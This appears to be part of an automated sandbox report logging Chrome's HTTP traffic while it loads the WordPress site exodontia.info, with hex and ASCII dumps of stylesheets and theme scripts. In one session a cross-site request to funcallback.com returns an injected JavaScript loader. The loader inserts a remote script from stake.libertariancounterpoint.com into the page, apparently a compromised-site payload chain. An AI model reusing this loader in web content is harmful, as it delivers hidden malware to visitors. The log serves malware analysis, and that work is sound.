                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 36 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 36 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 36 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 36 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 37 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 37 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72
                                                                                                                                      Data Ascii: ted-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-galler
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5f 5f 63 6f 6d 6d 65 6e 74 2d 61 76 61 74 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 35 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 32 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 37 35 65 6d 3b 77 69 64 74 68 3a 32 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5b 63 6c 61 73 73 2a 3d 2d 66 6f 6e 74 2d 73 69 7a 65 5d 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5b 73 74 79 6c 65 2a 3d 66 6f 6e 74 2d 73 69 7a 65 5d 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73
                                                                                                                                      Data Ascii: ck-latest-comments__comment-avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}.wp-block-latest-pos
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 67 61 70 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f
                                                                                                                                      Data Ascii: container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__
                                                                                                                                      2024-04-24 10:14:03 UTC22INData Raw: 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6c
                                                                                                                                      Data Ascii: :flex;flex-wrap:wrap;l


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      100192.168.2.1649844153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC595OUTGET /wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.10 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:02 UTC580INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:02 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Wed, 17 Apr 2024 22:07:26 GMT
                                                                                                                                      etag: "4ce-6620481e-ab39881871079a53;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1230
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:02 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:02 UTC788INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 66 6f 6e 74 73 2f 4a 54 55 52 6a 49 67 31 5f 69 36 74 38 6b 43 48 4b 6d 34 35 5f 62 5a 46 33 67 6e 44 5f 67 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 30 30 30 30 2d 30 30 46 46 2c 55 2b 30 31 33 31 2c 55 2b 30 31 35 32 2d 30 31 35 33 2c 55 2b 30 32 42 42 2d 30 32 42 43 2c 55 2b 30 32 43 36 2c 55 2b 30 32 44 41 2c 55 2b 30 32 44 43 2c 55 2b 32 30 30 30 2d 32 30 36 46 2c 55 2b 32 30 37 34 2c 55 2b
                                                                                                                                      Data Ascii: @font-face{font-family:'Montserrat';font-style:normal;font-weight:600;font-display:swap;src:url(fonts/JTURjIg1_i6t8kCHKm45_bZF3gnD_g.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+
                                                                                                                                      2024-04-24 10:14:02 UTC442INData Raw: 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 33 7d 2e 6c 70 2d 63 6c 6f 73 65 2d 73 63 72 65 65 6e 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 2e 39 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 70 2d 66 61 64 65 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 31 2e 30 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 2e 30 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 6c 70 2d 66 61 64 65 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 31 2e 30 7d 35 30 25 7b
                                                                                                                                      Data Ascii: ite;background:black;display:inline-block;font-family:sans-serif;cursor:pointer;font-size:12px;opacity:.3}.lp-close-screen:hover{opacity:.9}@keyframes lp-fade{from{opacity:1.0}50%{opacity:.5}to{opacity:1.0}}@-webkit-keyframes lp-fade{from{opacity:1.0}50%{


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      101192.168.2.1649843153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC600OUTGET /wp-content/plugins/wp-gdpr-compliance/Assets/css/front.css?ver=1706555011 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:02 UTC582INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:02 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Mon, 29 Jan 2024 19:03:31 GMT
                                                                                                                                      etag: "66d0-65b7f683-26b3cb58a96c7dfa;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 26320
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:02 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:02 UTC786INData Raw: 2e 77 70 67 64 70 72 63 20 2e 77 70 67 64 70 72 63 2d 63 6f 6e 73 65 6e 74 2d 62 61 72 5f 5f 6e 6f 74 69 63 65 2c 2e 77 70 67 64 70 72 63 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 2e 77 70 67 64 70 72 63 20 64 64 2c 2e 77 70 67 64 70 72 63 20 64 6c 2c 2e 77 70 67 64 70 72 63 20 66 69 65 6c 64 73 65 74 2c 2e 77 70 67 64 70 72 63 20 66 69 67 75 72 65 2c 2e 77 70 67 64 70 72 63 20 68 31 2c 2e 77 70 67 64 70 72 63 20 68 32 2c 2e 77 70 67 64 70 72 63 20 68 33 2c 2e 77 70 67 64 70 72 63 20 68 34 2c 2e 77 70 67 64 70 72 63 20 68 35 2c 2e 77 70 67 64 70 72 63 20 68 36 2c 2e 77 70 67 64 70 72 63 20 68 72 2c 2e 77 70 67 64 70 72 63 20 6c 65 67 65 6e 64 2c 2e 77 70 67 64 70 72 63 20 6f 6c 2c 2e 77 70 67 64 70 72 63 20 70 2c 2e 77 70 67 64 70 72 63 20 70 72 65 2c 2e 77 70
                                                                                                                                      Data Ascii: .wpgdprc .wpgdprc-consent-bar__notice,.wpgdprc blockquote,.wpgdprc dd,.wpgdprc dl,.wpgdprc fieldset,.wpgdprc figure,.wpgdprc h1,.wpgdprc h2,.wpgdprc h3,.wpgdprc h4,.wpgdprc h5,.wpgdprc h6,.wpgdprc hr,.wpgdprc legend,.wpgdprc ol,.wpgdprc p,.wpgdprc pre,.wp
                                                                                                                                      2024-04-24 10:14:03 UTC14994INData Raw: 30 2c 2e 36 2c 2e 37 2c 31 29 7d 2e 77 70 67 64 70 72 63 20 66 6f 72 6d 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 77 70 67 64 70 72 63 20 2e 6e 6f 2d 62 75 6c 6c 65 74 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 70 67 64 70 72 63 20 2e 76 69 64 65 6f 2d 63 6f 6e 74 61 69 6e 65 72 7b 68 65 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 36 2e 32 35 25 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 2e 36 2c 2e 37 2c 31 29 7d 2e 77 70 67 64 70 72 63 20 2e 76 69 64 65 6f 2d 63 6f 6e 74 61 69 6e 65 72 20 69 66
                                                                                                                                      Data Ascii: 0,.6,.7,1)}.wpgdprc form{margin-bottom:0}.wpgdprc .no-bullet{list-style:none}.wpgdprc .video-container{height:0;opacity:0;padding-bottom:56.25%;padding-top:25px;position:relative;transition:opacity .25s cubic-bezier(0,.6,.7,1)}.wpgdprc .video-container if
                                                                                                                                      2024-04-24 10:14:03 UTC10540INData Raw: 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 66 6f 72 77 61 72 64 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 66 6f 72 77 61 72 64 73 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 2d 6f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 2d 6f 75 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 2e 36 2c 2e 37 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 2e 36 2c 2e 37 2c 31 29 7d 2e 77 70 67 64 70 72 63 2d 6d 65 73 73 61 67 65 5f 5f 69 63 6f 6e 7b 61 6c 69 67 6e 2d 73 65
                                                                                                                                      Data Ascii: t-animation-fill-mode:forwards;animation-fill-mode:forwards;-webkit-animation-name:fade-out;animation-name:fade-out;-webkit-animation-timing-function:cubic-bezier(0,.6,.7,1);animation-timing-function:cubic-bezier(0,.6,.7,1)}.wpgdprc-message__icon{align-se


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      102192.168.2.1649842153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC608OUTGET /wp-content/themes/themify-shoppe/themify/themify-builder/js/themify.builder.script.js?ver=5.6.4 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:02 UTC598INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:02 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:33 GMT
                                                                                                                                      etag: "6510-64623fed-4cc2769c48f6487b;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 25872
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:02 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:02 UTC770INData Raw: 6c 65 74 20 54 68 65 6d 69 66 79 42 75 69 6c 64 65 72 4d 6f 64 75 6c 65 4a 73 3b 0d 0a 0d 0a 28 28 24 2c 20 77 69 6e 2c 54 68 65 6d 69 66 79 2c 20 64 6f 63 2c 75 6e 64 2c 76 61 72 73 29 3d 3e 7b 0d 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0d 0a 0d 0a 20 20 20 20 54 68 65 6d 69 66 79 42 75 69 6c 64 65 72 4d 6f 64 75 6c 65 4a 73 20 3d 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 6f 61 64 65 64 41 64 64 6f 6e 73 3a 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 63 73 73 55 72 6c 3a 27 27 2c 0d 0a 20 20 20 20 20 20 20 20 6a 73 55 72 6c 3a 27 27 2c 0d 0a 20 20 20 20 20 20 20 20 75 72 6c 3a 76 61 72 73 2e 62 75 69 6c 64 65 72 5f 75 72 6c 2c 0d 0a 20 20 20 20 20 20 20 20 6a 73 5f 6d 6f 64 75 6c 65 73 3a 76 61 72 73 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2c 0d 0a 20 20
                                                                                                                                      Data Ascii: let ThemifyBuilderModuleJs;(($, win,Themify, doc,und,vars)=>{ 'use strict'; ThemifyBuilderModuleJs = { loadedAddons:{}, cssUrl:'', jsUrl:'', url:vars.builder_url, js_modules:vars.js_modules,
                                                                                                                                      2024-04-24 10:14:03 UTC14994INData Raw: 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 64 61 74 61 2d 73 74 69 63 6b 79 2d 61 63 74 69 76 65 5d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 74 69 63 6b 79 49 74 65 6d 73 5b 30 5d 21 3d 3d 75 6e 64 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 77 69 6e 2e 70 61 67 65 59 4f 66 66 73 65 74 3e 30 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 73 74 69 63 6b 79 45 6c 65 6d 65 6e 74 49 6e 69 74 28 73 74 69 63 6b 79 49 74 65 6d 73 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: .querySelectorAll('[data-sticky-active]'); if(stickyItems[0]!==und){ if(win.pageYOffset>0){ this.stickyElementInit(stickyItems); } else{
                                                                                                                                      2024-04-24 10:14:03 UTC10108INData Raw: 45 6c 65 6d 65 6e 74 49 6e 69 74 28 69 74 65 6d 73 29 20 7b 0d 0a 09 09 09 69 66 28 76 61 72 73 5b 27 69 73 5f 73 74 69 63 6b 79 27 5d 3d 3d 3d 27 27 20 7c 7c 20 28 74 68 69 73 2e 69 73 42 70 4d 6f 62 69 6c 65 3d 3d 3d 74 72 75 65 20 26 26 20 76 61 72 73 5b 27 69 73 5f 73 74 69 63 6b 79 27 5d 3d 3d 3d 27 6d 27 29 29 7b 0d 0a 09 09 09 09 72 65 74 75 72 6e 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 69 74 65 6d 73 20 26 26 20 69 74 65 6d 73 5b 30 5d 21 3d 3d 75 6e 64 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 54 68 65 6d 69 66 79 2e 6a 73 4c 61 7a 79 5b 27 74 62 5f 73 74 69 63 6b 79 27 5d 3d 3d 3d 75 6e 64 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 65 6d 69 66 79 2e 4c
                                                                                                                                      Data Ascii: ElementInit(items) {if(vars['is_sticky']==='' || (this.isBpMobile===true && vars['is_sticky']==='m')){return;} if(items && items[0]!==und){ if(Themify.jsLazy['tb_sticky']===und){ Themify.L


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      103192.168.2.164985131.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC556OUTGET /WyNzslZcNXc4hHNvLCDDiTamINVoxtt-L-d6Ayg3PMl HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:03 UTC819INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9ebc; expires=Sat, 25 May 2024 10:14:03 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ2OTZcIjoxNzEzOTUzNjQzLFwiNDc2M1wiOjE3MTM5NTM2NDMsXCI0Njg4XCI6MTcxMzk1MzY0MyxcIjQ2NzhcIjoxNzEzOTUzNjQzfSxcImNhbXBhaWduc1wiOntcIjIxNlwiOjE3MTM5NTM2NDMsXCIyMjlcIjoxNzEzOTUzNjQzLFwiMjMxXCI6MTcxMzk1MzY0MyxcIjIyOFwiOjE3MTM5NTM2NDN9LFwidGltZVwiOjE3MTM5NTM2NDN9In0.ajpIlj9xM0-Nku5jYIKDvBlEqCMeI14T5nhDk44bo6g; expires=Fri, 19 Aug 2078 20:28:06 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:03 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      104192.168.2.1649837142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:03 UTC2171INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGOq2o7EGIjCFqtejcJY6F0uPQ2ZgEB_9ydMr9SMKXELgCbU-jevUbU7nAYltJT1tCsx5jLDtktQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgsI67ajsQYQqp_7VRIEmhBpJA
